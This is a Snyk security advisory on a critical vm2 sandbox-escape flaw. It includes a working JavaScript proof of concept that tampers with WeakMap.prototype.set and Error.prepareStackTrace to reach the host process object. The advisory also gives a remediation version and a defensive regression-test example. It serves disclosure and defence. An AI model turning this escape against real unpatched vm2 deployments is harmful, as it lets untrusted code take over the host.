SNYK-JS-VM2-2990237 PUBLISHED CVSS 9.8 CRITICAL

## Overview

[vm2](https://github.com/patriksimek/vm2#readme) is a sandbox that can run untrusted code with Node's whitelisted built-in modules.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the `WeakMap.prototype.set` method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.

## PoC

```js
const { VM } = require('vm2');

new VM().run(`
  const { set } = WeakMap.prototype;
  WeakMap.prototype.set = function(v) {
    return set.call(this, v, v);
  };
  Error.prepareStackTrace = Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a);
  const { stack } = new Error();
  Error.prepareStackTrace = undefined;
  stack.process.exit(1);
`);

// Never gets executed.
console.log('Finished');
```

## Remediation

Upgrade `vm2` to version 3.9.10 or higher.

## References

- [GitHub Commit](https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69)
- [GitHub Issue](https://github.com/patriksimek/vm2/issues/444)
- [GitHub PR](https://github.com/patriksimek/vm2/pull/445)
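The overview attributes the flaw to resolving `WeakMap.prototype.set` through the prototype at call time. The following added example (not vm2's code and not part of the advisory) contrasts that pattern with calling intrinsics captured at load time; the object-to-wrapper cache and every function name in it are hypothetical.

```javascript
// Added illustration, not vm2 source: a small object-to-wrapper cache of the
// kind a sandbox bridge might keep (assumption), written two ways.

// Capture intrinsics once, before any untrusted code can run.
const weakMapGet = WeakMap.prototype.get;
const weakMapSet = WeakMap.prototype.set;
const reflectApply = Reflect.apply;

// Weak: resolves .set/.get through WeakMap.prototype on every call.
function makeCacheWithLookup() {
  const cache = new WeakMap();
  return {
    remember(target, wrapper) { cache.set(target, wrapper); },
    lookup(target) { return cache.get(target); },
  };
}

// Hardened: calls the captured intrinsics, so later prototype edits are ignored.
function makeCacheWithIntrinsics() {
  const cache = new WeakMap();
  return {
    remember(target, wrapper) { reflectApply(weakMapSet, cache, [target, wrapper]); },
    lookup(target) { return reflectApply(weakMapGet, cache, [target]); },
  };
}

// Test helper: replace WeakMap.prototype.set the way the PoC does, run fn,
// then restore the original method.
function withTamperedSet(fn) {
  const original = WeakMap.prototype.set;
  WeakMap.prototype.set = function (key) {
    return reflectApply(original, this, [key, key]); // value argument dropped
  };
  try { return fn(); } finally { WeakMap.prototype.set = original; }
}

// True when the cache hands back the wrapper rather than the raw target.
function cacheReturnsWrapper(makeCache) {
  return withTamperedSet(() => {
    const cache = makeCache();
    const target = { name: 'host object' };
    const wrapper = { name: 'wrapper' };
    cache.remember(target, wrapper);
    return cache.lookup(target) === wrapper;
  });
}

console.log('prototype lookup keeps wrapper:  ', cacheReturnsWrapper(makeCacheWithLookup));
console.log('captured intrinsic keeps wrapper:', cacheReturnsWrapper(makeCacheWithIntrinsics));
```

The same check works as a regression test for any code that shares built-in prototypes with untrusted callers: modify the prototype method in a test and assert that the stored mapping is unchanged.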

Risk Scores

CVSS v3.1
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P
